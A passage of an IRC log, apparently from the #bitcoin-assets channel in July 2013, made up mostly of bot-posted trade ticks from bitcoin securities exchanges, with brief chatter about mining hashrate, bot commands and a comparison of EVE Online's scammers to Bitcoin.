BTC [-] Jul 12 19:47:29 nice Jul 12 19:47:29 [HAVELOCK] [SDICE] 3 @ 0.2 = 0.6 BTC [-] Jul 12 19:47:31 i dont know where that is Jul 12 19:47:37 so i cant tell you whats it gonna be Jul 12 19:47:39 i guess that's at 4ghash or so Jul 12 19:47:42 [HAVELOCK] [SDSTM] 4 @ 0.0142 = 0.0568 BTC [-] Jul 12 19:47:43 :P Jul 12 19:47:44 [BTCTC] [DMS.SELLING] 1 @ 0.024997 BTC [-] Jul 12 19:47:45 [BTCTC] [DMS.SELLING] 559 @ 0.024998 = 13.9739 BTC [+] Jul 12 19:47:46 [BTCTC] [DMS.SELLING] 1 @ 0.02735 BTC [+] Jul 12 19:47:48 [BTCTC] [DMS.SELLING] 93 @ 0.027899 = 2.5946 BTC [+] Jul 12 19:47:49 [BTCTC] [DMS.SELLING] 49 @ 0.0279 = 1.3671 BTC [+] Jul 12 19:47:49 [BTCTC] [DMS.SELLING] 113 @ 0.0299 = 3.3787 BTC [+] Jul 12 19:47:50 [BTCTC] [DMS.SELLING] 50 @ 0.03 = 1.5 BTC [+] Jul 12 19:47:52 if you do hell-freezing on them.... 5 ghash Jul 12 19:47:52 [BTCTC] [DMS.SELLING] 134 @ 0.031 = 4.154 BTC [+] Jul 12 19:48:35 [BTCTC] [DMS.MINING] 30 @ 0.0151 = 0.453 BTC [-] Jul 12 19:48:37 [BTCTC] [DMS.MINING] 14 @ 0.015001 = 0.21 BTC [-] Jul 12 19:48:39 [BTCTC] [DMS.MINING] 10 @ 0.015001 = 0.15 BTC [-] Jul 12 19:48:40 [BTCTC] [DMS.MINING] 9 @ 0.015001 = 0.135 BTC [-] Jul 12 19:48:42 [BTCTC] [DMS.MINING] 10 @ 0.015001 = 0.15 BTC [-] Jul 12 19:48:51 [BTCTC] [DMS.PURCHASE] 65 @ 0.040366 = 2.6238 BTC [-] Jul 12 19:50:56 [BTCTC] [AMC-PT] 829 @ 0.0025 = 2.0725 BTC [+] Jul 12 19:50:57 [BTCTC] [PAJKA.BOND] 3 @ 0.05 = 0.15 BTC [-] Jul 12 19:51:01 [HAVELOCK] [SDSTM] 12 @ 0.01489 = 0.1787 BTC [+] Jul 12 19:51:21 [BTCTC] [DMS.MINING] 65 @ 0.015 = 0.975 BTC [-] Jul 12 19:51:39 [BTCTC] [DMS.MINING] 17 @ 0.015 = 0.255 BTC [-] Jul 12 19:51:57 [BTCTC] [DMS.PURCHASE] 135 @ 0.040366 = 5.4494 BTC [-] Jul 12 19:52:38 [BTCTC] [DMS.SELLING] 24 @ 0.028999 = 0.696 BTC [-] Jul 12 19:52:53 [BTCTC] [DMS.MINING] 52 @ 0.015 = 0.78 BTC [-] Jul 12 19:53:12 [BTCTC] [ASICMINER-PT] 1 @ 4.299989 BTC [+] Jul 12 19:53:25 [BTCTC] [DMS.SELLING] 1 @ 0.027 BTC [-] Jul 12 19:53:39 [BTCTC] [DMS.PURCHASE] 59 @ 0.040366 = 2.3816 BTC [-] Jul 12 19:53:53 [BTCTC] [TAT.ASICMINER] 50 @ 0.042386 = 2.1193 BTC [+] Jul 12 19:54:03 [BTCTC] [DMS.MINING] 94 @ 0.015 = 1.41 BTC [-] Jul 12 19:54:10 [BTCTC] [BASIC-MINING] 7 @ 0.5978 = 4.1846 BTC [+] Jul 12 19:54:12 [BTCTC] [BASIC-MINING] 1 @ 0.5979 BTC [+] Jul 12 19:54:21 [BTCTC] [DMS.PURCHASE] 52 @ 0.040366 = 2.099 BTC [-] Jul 12 19:54:22 [BTCTC] [BASIC-MINING] 2 @ 0.55 = 1.1 BTC [-] Jul 12 19:54:33 [BTCTC] [TAT.ASICMINER] 23 @ 0.042387 = 0.9749 BTC [+] Jul 12 19:54:57 [BTCTC] [TAT.ASICMINER] 8 @ 0.04239 = 0.3391 BTC [+] Jul 12 19:55:11 [BTCTC] [DMS.SELLING] 1 @ 0.027999 BTC [+] Jul 12 19:55:18 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004 BTC [-] Jul 12 19:55:19 [BTCTC] [TAT.VIRTUALMINE] 59 @ 0.004 = 0.236 BTC [-] Jul 12 19:55:38 [BTCTC] [TAT.ASICMINER] 19 @ 0.042899 = 0.8151 BTC [+] Jul 12 19:56:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.042899 = 0.2145 BTC [+] Jul 12 19:56:33 [BTCTC] [TAT.ASICMINER] 49 @ 0.0429 = 2.1021 BTC [+] Jul 12 19:56:46 [BTCTC] [DMS.SELLING] 1 @ 0.0275 BTC [-] Jul 12 19:56:48 [BTCTC] [DMS.MINING] 65 @ 0.015 = 0.975 BTC [-] Jul 12 19:57:09 [BTCTC] [DMS.SELLING] 65 @ 0.026 = 1.69 BTC [-] Jul 12 19:57:18 [BTCTC] [DMS.PURCHASE] 7 @ 0.040366 = 0.2826 BTC [-] Jul 12 19:57:24 [MPEX] [S.MPOE] 5350 @ 0.00081814 = 4.377 BTC [+] Jul 12 19:57:39 [BTCTC] [DMS.MINING] 707 @ 0.015 = 10.605 BTC [-] Jul 12 19:58:00 [BTCTC] [DMS.PURCHASE] 100 @ 0.040366 = 4.0366 BTC [-] Jul 12 19:58:20 [BTCTC] [BASIC-MINING] 1 @ 0.5979 BTC [+] Jul 12 19:58:22 [BTCTC] [DMS.SELLING] 17 @ 0.0265 = 0.4505 BTC [+] Jul 12 19:58:24 [BTCTC] [TAT.ASICMINER] 15 @ 0.041313 = 0.6197 BTC [-] Jul 12 19:58:25 [BTCTC] [DMS.SELLING] 703 @ 0.026 = 18.278 BTC [-] Jul 12 19:58:37 [BTCTC] [BASIC-MINING] 3 @ 0.54 = 1.62 BTC [-] Jul 12 19:58:38 [BTCTC] [BASIC-MINING] 10 @ 0.54 = 5.4 BTC [-] Jul 12 19:59:24 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004 = 0.04 BTC [-] Jul 12 19:59:28 [BTCTC] [TAT.ASICMINER] 5 @ 0.0414 = 0.207 BTC [+] Jul 12 20:00:14 [BTCTC] [DMS.MINING] 4 @ 0.0154 = 0.0616 BTC [+] Jul 12 20:01:04 [BTCTC] [DMS.SELLING] 1 @ 0.0275 BTC [+] Jul 12 20:01:17 [HAVELOCK] [SDSTM] 100 @ 0.0149 = 1.49 BTC [+] Jul 12 20:03:29 [BTCTC] [DMS.SELLING] 1 @ 0.0275 BTC [+] Jul 12 20:03:30 [BTCTC] [ASICMINER-PT] 10 @ 4.299989 = 42.9999 BTC [+] Jul 12 20:03:37 [BTCTC] [DMS.SELLING] 1 @ 0.027999 BTC [+] Jul 12 20:04:24 [BTCTC] [DMS.SELLING] 74 @ 0.027999 = 2.0719 BTC [+] Jul 12 20:04:35 [HAVELOCK] [SDSTM] 40 @ 0.0149 = 0.596 BTC [+] Jul 12 20:05:36 [HAVELOCK] [AM100] 50 @ 0.04 = 2 BTC [-] Jul 12 20:05:54 [HAVELOCK] [SDSTM] 60 @ 0.0149 = 0.894 BTC [+] Jul 12 20:05:56 [HAVELOCK] [SDSTM] 5 @ 0.0149 = 0.0745 BTC [+] Jul 12 20:06:32 [HAVELOCK] [AM100] 1 @ 0.04 BTC [-] Jul 12 20:07:16 [BTCTC] [DMS.SELLING] 20 @ 0.028499 = 0.57 BTC [+] Jul 12 20:07:18 [BTCTC] [DMS.SELLING] 80 @ 0.0285 = 2.28 BTC [+] Jul 12 20:08:27 [BTCTC] [BASIC-MINING] 2 @ 0.597 = 1.194 BTC [+] Jul 12 20:08:58 [BTCTC] [BASIC-MINING] 8 @ 0.555 = 4.44 BTC [-] Jul 12 20:09:00 [BTCTC] [BASIC-MINING] 42 @ 0.55 = 23.1 BTC [-] Jul 12 20:09:17 [BTCTC] [LTC-ATF.B2] 3 @ 0.01048 = 0.0314 BTC [+] Jul 12 20:09:32 [BTCTC] [BASIC-MINING] 4 @ 0.55 = 2.2 BTC [-] Jul 12 20:11:31 [BTCTC] [DMS.PURCHASE] 1000 @ 0.040366 = 40.366 BTC [-] Jul 12 20:11:32 ok time to play with Basic some Jul 12 20:11:33 [BTCTC] [DMS.MINING] 5 @ 0.0145 = 0.0725 BTC [-] Jul 12 20:11:35 [BTCTC] [DMS.MINING] 1 @ 0.0145 BTC [-] Jul 12 20:11:44 [BTCTC] [DMS.MINING] 10 @ 0.0144 = 0.144 BTC [-] Jul 12 20:11:46 [BTCTC] [DMS.MINING] 10 @ 0.0143 = 0.143 BTC [-] Jul 12 20:11:47 [BTCTC] [DMS.MINING] 10 @ 0.0142 = 0.142 BTC [-] Jul 12 20:11:49 [BTCTC] [DMS.MINING] 20 @ 0.0142 = 0.284 BTC [-] Jul 12 20:11:50 [BTCTC] [DMS.MINING] 10 @ 0.0141 = 0.141 BTC [-] Jul 12 20:11:51 [BTCTC] [DMS.MINING] 2 @ 0.0141 = 0.0282 BTC [-] Jul 12 20:11:53 [BTCTC] [DMS.MINING] 67 @ 0.01401 = 0.9387 BTC [-] Jul 12 20:12:09 [HAVELOCK] [SDSTM] 62 @ 0.01430005 = 0.8866 BTC [-] Jul 12 20:12:20 [HAVELOCK] [SDSTM] 88 @ 0.0143 = 1.2584 BTC [-] Jul 12 20:12:46 [BTCTC] [DMS.MINING] 33 @ 0.01401 = 0.4623 BTC [-] Jul 12 20:13:05 [HAVELOCK] [SDSTM] 20 @ 0.015 = 0.3 BTC [+] Jul 12 20:13:18 [BTCTC] [DMS.MINING] 11 @ 0.0141 = 0.1551 BTC [+] Jul 12 20:13:20 [BTCTC] [DMS.MINING] 15 @ 0.014001 = 0.21 BTC [-] Jul 12 20:13:52 [HAVELOCK] [SDSTM] 12 @ 0.0143 = 0.1716 BTC [-] Jul 12 20:14:45 [HAVELOCK] [AM100] 17 @ 0.0405 = 0.6885 BTC [+] Jul 12 20:15:04 [HAVELOCK] [SDSTM] 30 @ 0.015 = 0.45 BTC [+] Jul 12 20:15:12 [HAVELOCK] [SDSTM] 30 @ 0.015 = 0.45 BTC [+] Jul 12 20:15:47 [HAVELOCK] [SDSTM] 2 @ 0.015 = 0.03 BTC [+] Jul 12 20:18:46 [BTCTC] [DMS.MINING] 1 @ 0.015399 BTC [+] Jul 12 20:20:39 [BTCTC] [DMS.SELLING] 5 @ 0.0275 = 0.1375 BTC [-] Jul 12 20:23:32 [BTCTC] [DMS.MINING] 25 @ 0.015 = 0.375 BTC [-] Jul 12 20:23:59 "1° convegno dei dentisti dantisti" Jul 12 20:24:07 bah i thought i was being original. Jul 12 20:26:12 [BTCTC] [DMS.SELLING] 20 @ 0.026004 = 0.5201 BTC [-] Jul 12 20:26:21 [BTCTC] [DMS.MINING] 6 @ 0.015 = 0.09 BTC [-] Jul 12 20:26:28 [HAVELOCK] [AM100] 2 @ 0.04001 = 0.08 BTC [-] Jul 12 20:26:30 [HAVELOCK] [AM100] 17 @ 0.0405 = 0.6885 BTC [+] Jul 12 20:26:37 [HAVELOCK] [AM100] 50 @ 0.0408 = 2.04 BTC [+] Jul 12 20:26:43 [HAVELOCK] [AM100] 25 @ 0.0408 = 1.02 BTC [+] Jul 12 20:26:47 [MPEX] [S.MPOE] 4000 @ 0.00081814 = 3.2726 BTC [+] Jul 12 20:26:48 [MPEX] [S.MPOE] 16696 @ 0.00082134 = 13.7131 BTC [+] Jul 12 20:26:54 [HAVELOCK] [AM100] 3 @ 0.0409 = 0.1227 BTC [+] Jul 12 20:29:10 [HAVELOCK] [AM100] 10 @ 0.0416 = 0.416 BTC [+] Jul 12 20:29:11 [HAVELOCK] [AM100] 50 @ 0.0414 = 2.07 BTC [-] Jul 12 20:29:57 [HAVELOCK] [AM100] 33 @ 0.0414 = 1.3662 BTC [-] Jul 12 20:30:26 [BTCTC] [DMS.SELLING] 10 @ 0.02501 = 0.2501 BTC [-] Jul 12 20:30:29 [HAVELOCK] [AM100] 17 @ 0.0414 = 0.7038 BTC [-] Jul 12 20:31:50 [BTCTC] [COGNITIVE] 2 @ 0.42 = 0.84 BTC [-] Jul 12 20:32:13 [BTCTC] [DMS.MINING] 18 @ 0.01535 = 0.2763 BTC [+] Jul 12 20:32:44 [BTCTC] [BASIC-MINING] 2 @ 0.597989 = 1.196 BTC [+] Jul 12 20:33:20 [HAVELOCK] [SDSTM] 6 @ 0.015 = 0.09 BTC [+] Jul 12 20:34:14 [BTCTC] [ASICMINER-PT] 1 @ 4.19 BTC [-] Jul 12 20:35:23 [HAVELOCK] [AM100] 12 @ 0.041697 = 0.5004 BTC [+] Jul 12 20:36:34 [MPEX] [S.MPOE] 6240 @ 0.00082134 = 5.1252 BTC [+] Jul 12 20:37:00 [BTCTC] [DMS.SELLING] 1 @ 0.026748 BTC [+] Jul 12 20:37:22 [BTCTC] [AMC-PT] 1671 @ 0.0025 = 4.1775 BTC [+] Jul 12 20:37:42 [BTCTC] [DMS.MINING] 35 @ 0.015 = 0.525 BTC [-] Jul 12 20:37:46 [BTCTC] [DMS.MINING] 20 @ 0.015349 = 0.307 BTC [+] Jul 12 20:37:48 [BTCTC] [DMS.MINING] 132 @ 0.01535 = 2.0262 BTC [+] Jul 12 20:37:49 [BTCTC] [DMS.MINING] 6 @ 0.0154 = 0.0924 BTC [+] Jul 12 20:37:50 [BTCTC] [DMS.MINING] 7 @ 0.015499 = 0.1085 BTC [+] Jul 12 20:38:02 what's that mean? Jul 12 20:39:03 [HAVELOCK] [AM100] 79 @ 0.039903 = 3.1523 BTC [-] Jul 12 20:39:05 [HAVELOCK] [AM100] 300 @ 0.039902 = 11.9706 BTC [-] Jul 12 20:39:15 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00414 = 0.0207 BTC [+] Jul 12 20:39:18 [BTCTC] [DMS.MINING] 15 @ 0.015499 = 0.2325 BTC [+] Jul 12 20:41:12 [BTCTC] [GSDPT] 50 @ 0.002071 = 0.1036 BTC [-] Jul 12 20:41:39 [HAVELOCK] [AM100] 94 @ 0.039801 = 3.7413 BTC [-] Jul 12 20:42:51 [HAVELOCK] [AM100] 95 @ 0.039801 = 3.7811 BTC [-] Jul 12 20:43:48 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.00414 = 0.1035 BTC [+] Jul 12 20:44:20 [BTCTC] [AMC-PT] 22 @ 0.00249 = 0.0548 BTC [-] Jul 12 20:44:30 [BTCTC] [DMS.SELLING] 20 @ 0.025 = 0.5 BTC [-] Jul 12 20:44:47 ;;later tell topace Please pm when you are available, 2 topics to discuss Jul 12 20:44:47 The operation succeeded. Jul 12 20:44:51 [BTCTC] [DMS.MINING] 5 @ 0.015 = 0.075 BTC [-] Jul 12 20:45:46 [HAVELOCK] [AM100] 66 @ 0.039801 = 2.6269 BTC [-] Jul 12 20:45:59 ThickAsThieves: you hold S.MG right? Jul 12 20:46:25 [HAVELOCK] [AM100] 1 @ 0.0398 BTC [-] Jul 12 20:46:26 [HAVELOCK] [AM100] 5 @ 0.03961 = 0.1981 BTC [-] Jul 12 20:46:27 [HAVELOCK] [AM100] 10 @ 0.0396 = 0.396 BTC [-] Jul 12 20:46:27 some, yes Jul 12 20:46:28 [HAVELOCK] [AM100] 100 @ 0.03955 = 3.955 BTC [-] Jul 12 20:46:29 [HAVELOCK] [AM100] 126 @ 0.03951 = 4.9783 BTC [-] Jul 12 20:46:30 [HAVELOCK] [AM100] 1 @ 0.039498 BTC [-] Jul 12 20:46:32 [HAVELOCK] [AM100] 1 @ 0.0394 BTC [-] Jul 12 20:46:32 [HAVELOCK] [AM100] 6 @ 0.03925 = 0.2355 BTC [-] Jul 12 20:46:47 [BTCTC] [BASIC-MINING] 1 @ 0.560001 BTC [-] Jul 12 20:47:01 You should play my game prototype with MP over the weekend. Jul 12 20:48:07 i'm open to it Jul 12 20:48:08 [BTCTC] [TAT.ASICMINER] 3 @ 0.041411 = 0.1242 BTC [+] Jul 12 20:48:15 [BTCTC] [TAT.ASICMINER] 6 @ 0.04141 = 0.2485 BTC [-] Jul 12 20:48:17 [BTCTC] [TAT.ASICMINER] 24 @ 0.041403 = 0.9937 BTC [-] Jul 12 20:48:19 [BTCTC] [TAT.ASICMINER] 49 @ 0.041402 = 2.0287 BTC [-] Jul 12 20:48:21 [BTCTC] [TAT.ASICMINER] 4 @ 0.041401 = 0.1656 BTC [-] Jul 12 20:48:26 [BTCTC] [TAT.ASICMINER] 14 @ 0.0414 = 0.5796 BTC [-] Jul 12 20:48:45 [BTCTC] [DMS.MINING] 20 @ 0.015199 = 0.304 BTC [+] Jul 12 20:51:36 [BTCTC] [DMS.MINING] 1 @ 0.0152 BTC [+] Jul 12 20:51:58 [BTCTC] [DMS.MINING] 39 @ 0.0152 = 0.5928 BTC [+] Jul 12 20:53:50 https://bitcoinfoundation.org/blog/?p=226 Jul 12 20:53:52 Bitcoin Foundation: Blog Jul 12 20:53:56 2013 Elections: Board of Directors Jul 12 20:55:45 [BTCTC] [COGNITIVE] 1 @ 0.401 BTC [-] Jul 12 20:55:47 [BTCTC] [COGNITIVE] 1 @ 0.4001 BTC [-] Jul 12 20:55:47 [BTCTC] [COGNITIVE] 7 @ 0.4 = 2.8 BTC [-] Jul 12 20:55:49 [BTCTC] [DMS.PURCHASE] 1 @ 0.040366 BTC [-] Jul 12 20:57:35 [BTCTC] [BASIC-MINING] 1 @ 0.5602 BTC [+] Jul 12 20:57:50 [BTCTC] [BASIC-MINING] 1 @ 0.5602 BTC [+] Jul 12 20:58:16 [BTCTC] [AMC-PT] 1600 @ 0.0025 = 4 BTC [+] Jul 12 20:59:04 [HAVELOCK] [AM100] 5 @ 0.040918 = 0.2046 BTC [+] Jul 12 20:59:06 [HAVELOCK] [AM100] 3 @ 0.040918 = 0.1228 BTC [+] Jul 12 20:59:28 [BTCTC] [COGNITIVE] 1 @ 0.449985 BTC [+] Jul 12 21:01:01 [BTCTC] [COGNITIVE] 1 @ 0.449986 BTC [+] Jul 12 21:01:03 [BTCTC] [TAT.ASICMINER] 6 @ 0.041401 = 0.2484 BTC [+] Jul 12 21:02:12 [BTCTC] [COGNITIVE] 7 @ 0.45 = 3.15 BTC [+] Jul 12 21:02:13 [BTCTC] [AMC-PT] 396 @ 0.0025 = 0.99 BTC [+] Jul 12 21:02:56 [BTCTC] [DMS.PURCHASE] 100 @ 0.040366 = 4.0366 BTC [-] Jul 12 21:02:58 [BTCTC] [DMS.SELLING] 20 @ 0.026698 = 0.534 BTC [+] Jul 12 21:03:00 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.00414 = 2.07 BTC [+] Jul 12 21:03:02 [BTCTC] [DMS.SELLING] 20 @ 0.026699 = 0.534 BTC [+] Jul 12 21:03:04 [BTCTC] [DMS.SELLING] 130 @ 0.0267 = 3.471 BTC [+] Jul 12 21:03:06 [BTCTC] [DMS.SELLING] 155 @ 0.02675 = 4.1463 BTC [+] Jul 12 21:04:00 timonex 246038 Mhash/s Jul 12 21:04:03 ^ basic Jul 12 21:04:10 [HAVELOCK] [VTX] 2 @ 0.8301 = 1.6602 BTC [-] Jul 12 21:04:24 ;;nethash Jul 12 21:04:24 221604.720711 Jul 12 21:05:55 [HAVELOCK] [VTX] 1 @ 0.83000101 BTC [-] Jul 12 21:07:30 [BTCTC] [DMS.PURCHASE] 13 @ 0.040366 = 0.5248 BTC [-] Jul 12 21:07:54 [BTCTC] [DMS.SELLING] 2 @ 0.028499 = 0.057 BTC [+] Jul 12 21:07:55 [BTCTC] [BASIC-MINING] 4 @ 0.594999 = 2.38 BTC [+] Jul 12 21:08:14 [BTCTC] [COGNITIVE] 1 @ 0.48998 BTC [+] Jul 12 21:08:34 [BTCTC] [BASIC-MINING] 1 @ 0.594999 BTC [+] Jul 12 21:08:37 [BTCTC] [BASIC-MINING] 2 @ 0.594999 = 1.19 BTC [+] Jul 12 21:08:40 [BTCTC] [COGNITIVE] 2 @ 0.489979 = 0.98 BTC [-] Jul 12 21:08:45 [BTCTC] [COGNITIVE] 1 @ 0.489982 BTC [+] Jul 12 21:09:17 [BTCTC] [COGNITIVE] 4 @ 0.489984 = 1.9599 BTC [+] Jul 12 21:10:37 [BTCTC] [DMS.PURCHASE] 2 @ 0.040366 = 0.0807 BTC [-] Jul 12 21:12:25 [MPEX] [S.MPOE] 267 @ 0.00082134 = 0.2193 BTC [+] Jul 12 21:12:27 [MPEX] [S.MPOE] 6304 @ 0.00082142 = 5.1782 BTC [+] Jul 12 21:12:44 [MPEX] [S.MPOE] 11300 @ 0.00082537 = 9.3267 BTC [+] Jul 12 21:13:23 [BTCTC] [DMS.PURCHASE] 1 @ 0.040366 BTC [-] Jul 12 21:14:14 [HAVELOCK] [VTX] 8 @ 0.83 = 6.64 BTC [-] Jul 12 21:15:33 [HAVELOCK] [SDSTM] 5 @ 0.01495 = 0.0748 BTC [-] Jul 12 21:17:50 [HAVELOCK] [SDSTM] 19 @ 0.015 = 0.285 BTC [+] Jul 12 21:19:09 [BTCTC] [DMS.SELLING] 1 @ 0.02825 BTC [-] Jul 12 21:19:32 [BTCTC] [TAT.ASICMINER] 12 @ 0.041403 = 0.4968 BTC [+] Jul 12 21:19:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.041403 = 0.207 BTC [+] Jul 12 21:19:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.041402 = 0.0828 BTC [-] Jul 12 21:19:38 [BTCTC] [TAT.ASICMINER] 31 @ 0.0414 = 1.2834 BTC [-] Jul 12 21:19:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.0413 = 0.1652 BTC [-] Jul 12 21:19:42 [BTCTC] [TAT.ASICMINER] 20 @ 0.04113 = 0.8226 BTC [-] Jul 12 21:19:44 [BTCTC] [TAT.ASICMINER] 9 @ 0.041129 = 0.3702 BTC [-] Jul 12 21:19:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.041126 = 0.2056 BTC [-] Jul 12 21:19:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.041126 BTC [-] Jul 12 21:19:50 [BTCTC] [TAT.ASICMINER] 15 @ 0.041125 = 0.6169 BTC [-] Jul 12 21:19:58 [BTCTC] [DMS.SELLING] 18 @ 0.028249 = 0.5085 BTC [-] Jul 12 21:20:18 [BTCTC] [S.MPOE-PT] 3 @ 0.000942 = 0.0028 BTC [-] Jul 12 21:21:21 [BTCTC] [BASIC-MINING] 2 @ 0.5949 = 1.1898 BTC [-] Jul 12 21:21:23 [BTCTC] [DMS.PURCHASE] 1 @ 0.040366 BTC [-] Jul 12 21:21:47 [BTCTC] [BASIC-MINING] 2 @ 0.5949 = 1.1898 BTC [-] Jul 12 21:21:57 [HAVELOCK] [SDSTM] 1 @ 0.01495 BTC [-] Jul 12 21:22:25 [BTCTC] [BASIC-MINING] 3 @ 0.599999 = 1.8 BTC [+] Jul 12 21:22:30 [BTCTC] [DMS.PURCHASE] 12 @ 0.040366 = 0.4844 BTC [-] Jul 12 21:23:09 [BTCTC] [TAT.ASICMINER] 9 @ 0.0428 = 0.3852 BTC [+] Jul 12 21:27:06 [BTCTC] [DMS.MINING] 40 @ 0.015199 = 0.608 BTC [-] Jul 12 21:27:41 [BTCTC] [BASIC-MINING] 7 @ 0.599999 = 4.2 BTC [+] Jul 12 21:27:41 [BTCTC] [BASIC-MINING] 34 @ 0.6 = 20.4 BTC [+] Jul 12 21:27:43 [BTCTC] [BASIC-MINING] 20 @ 0.6 = 12 BTC [+] Jul 12 21:27:44 [BTCTC] [BASIC-MINING] 20 @ 0.6 = 12 BTC [+] Jul 12 21:28:59 [BTCTC] [TAT.ASICMINER] 24 @ 0.041126 = 0.987 BTC [-] Jul 12 21:29:26 [BTCTC] [BASIC-MINING] 1 @ 0.625 BTC [+] Jul 12 21:29:59 [HAVELOCK] [AM100] 5 @ 0.039552 = 0.1978 BTC [-] Jul 12 21:30:01 [HAVELOCK] [AM100] 48 @ 0.039552 = 1.8985 BTC [-] Jul 12 21:30:02 [HAVELOCK] [AM100] 20 @ 0.03950101 = 0.79 BTC [-] Jul 12 21:30:03 [HAVELOCK] [AM100] 75 @ 0.039252 = 2.9439 BTC [-] Jul 12 21:30:05 [HAVELOCK] [AM100] 9 @ 0.03925 = 0.3533 BTC [-] Jul 12 21:30:06 [HAVELOCK] [AM100] 10 @ 0.0392 = 0.392 BTC [-] Jul 12 21:30:06 [HAVELOCK] [AM100] 10 @ 0.0392 = 0.392 BTC [-] Jul 12 21:30:07 [HAVELOCK] [AM100] 250 @ 0.0392 = 9.8 BTC [-] Jul 12 21:30:08 [HAVELOCK] [AM100] 50 @ 0.0392 = 1.96 BTC [-] Jul 12 21:30:47 [BTCTC] [COGNITIVE] 1 @ 0.450001 BTC [-] Jul 12 21:30:52 [BTCTC] [DMS.MINING] 9 @ 0.0152 = 0.1368 BTC [+] Jul 12 21:30:59 [BTCTC] [COGNITIVE] 1 @ 0.450001 BTC [-] Jul 12 21:31:21 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.004 = 0.8 BTC [-] Jul 12 21:32:15 [BTCTC] [BASIC-MINING] 1 @ 0.689 BTC [+] Jul 12 21:32:31 [BTCTC] [BASIC-MINING] 1 @ 0.62 BTC [-] Jul 12 21:33:11 [BTCTC] [BASIC-MINING] 1 @ 0.69 BTC [+] Jul 12 21:33:41 ... Jul 12 21:33:58 [BTCTC] [RSM] 28 @ 0.013 = 0.364 BTC [-] Jul 12 21:34:41 [BTCTC] [BASIC-MINING] 1 @ 0.69 BTC [+] Jul 12 21:35:42 [BTCTC] [DMS.PURCHASE] 15 @ 0.040366 = 0.6055 BTC [-] Jul 12 21:36:23 [BTCTC] [TAT.VIRTUALMINE] 70 @ 0.003915 = 0.2741 BTC [-] Jul 12 21:37:54 [BTCTC] [COGNITIVE] 1 @ 0.43 BTC [-] Jul 12 21:38:15 [BTCTC] [DMS.PURCHASE] 104 @ 0.040366 = 4.1981 BTC [-] Jul 12 21:39:41 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [+] Jul 12 21:40:15 [BTCTC] [S.DICE-PT] 200 @ 0.002289 = 0.4578 BTC [+] Jul 12 21:40:17 [BTCTC] [S.DICE-PT] 200 @ 0.002289 = 0.4578 BTC [+] Jul 12 21:40:19 [BTCTC] [S.DICE-PT] 100 @ 0.002289 = 0.2289 BTC [+] Jul 12 21:40:34 [BTCTC] [DMS.PURCHASE] 14 @ 0.040366 = 0.5651 BTC [-] Jul 12 21:47:27 [BTCTC] [ASICMINER-PT] 1 @ 4.249999 BTC [-] Jul 12 21:48:59 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.0041 = 0.0451 BTC [+] Jul 12 21:49:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.042647 BTC [+] Jul 12 21:50:30 [BTCTC] [DMS.MINING] 1 @ 0.015 BTC [-] Jul 12 21:50:32 [BTCTC] [DMS.MINING] 1 @ 0.015 BTC [-] Jul 12 21:50:33 [BTCTC] [DMS.MINING] 4 @ 0.0145 = 0.058 BTC [-] Jul 12 21:50:35 [BTCTC] [DMS.MINING] 1 @ 0.0143 BTC [-] Jul 12 21:50:37 [BTCTC] [DMS.MINING] 4 @ 0.01415 = 0.0566 BTC [-] Jul 12 21:50:38 [BTCTC] [DMS.MINING] 3 @ 0.0141 = 0.0423 BTC [-] Jul 12 21:50:55 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004147 BTC [+] Jul 12 21:51:06 [BTCTC] [RSM] 6 @ 0.013 = 0.078 BTC [-] Jul 12 21:52:19 [BTCTC] [DMS.PURCHASE] 150 @ 0.040366 = 6.0549 BTC [-] Jul 12 21:53:53 [BTCTC] [BASIC-MINING] 2 @ 0.75 = 1.5 BTC [+] Jul 12 21:54:21 [HAVELOCK] [SDSTM] 100 @ 0.0147 = 1.47 BTC [-] Jul 12 21:54:29 [HAVELOCK] [SDSTM] 44 @ 0.0145 = 0.638 BTC [-] Jul 12 21:54:34 [HAVELOCK] [SDSTM] 100 @ 0.0141 = 1.41 BTC [-] Jul 12 21:57:03 ;;seen mircea_popescu Jul 12 21:57:03 mircea_popescu was last seen in #bitcoin-assets 1 hour, 32 minutes, and 54 seconds ago: bah i thought i was being original. Jul 12 21:58:01 [BTCTC] [TAT.ASICMINER] 22 @ 0.041135 = 0.905 BTC [-] Jul 12 21:59:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.041135 BTC [-] Jul 12 21:59:29 So you're playing Eve now mircea_popescu ? Harharhar. S.MG may surprise us yet ;) Jul 12 21:59:41 [BTCTC] [BASIC-MINING] 1 @ 0.895 BTC [+] Jul 12 22:00:16 [BTCTC] [DMS.MINING] 10 @ 0.01415 = 0.1415 BTC [+] Jul 12 22:00:20 heh Jul 12 22:00:21 thestringpuller: cause it'll look like eve? Jul 12 22:01:12 No because of the emergent gameplay from a decade of it being live. Jul 12 22:01:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.042 BTC [+] Jul 12 22:01:18 [BTCTC] [BASIC-MINING] 1 @ 0.9 BTC [+] Jul 12 22:01:48 It's an interesting correlation mircea_popescu made with Eve in it being riddled with scammers. Jul 12 22:01:56 An uncanny observation. Jul 12 22:02:01 In comparison to BTC. Jul 12 22:02:07 is anyone here it owner of those 100+ bm shares between 0.9-1.0?# Jul 12 22:02:16 [BTCTC] [DMS.MINING] 27 @ 0.0141 = 0.3807 BTC [-] Jul 12 22:02:25 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.0041 = 0.0328 BTC [-] Jul 12 22:02:38 [BTCTC] [DMS.MINING] 22 @ 0.014003 = 0.3081 BTC [-] Jul 12 22:03:17 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.003915 = 0.1175 BTC [-] Jul 12 22:03:37 I don't think you'll find manty BASIC-MINING owners in here Jul 12 22:03:41 many* Jul 12 22:03:44 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003914 BTC [-] Jul 12 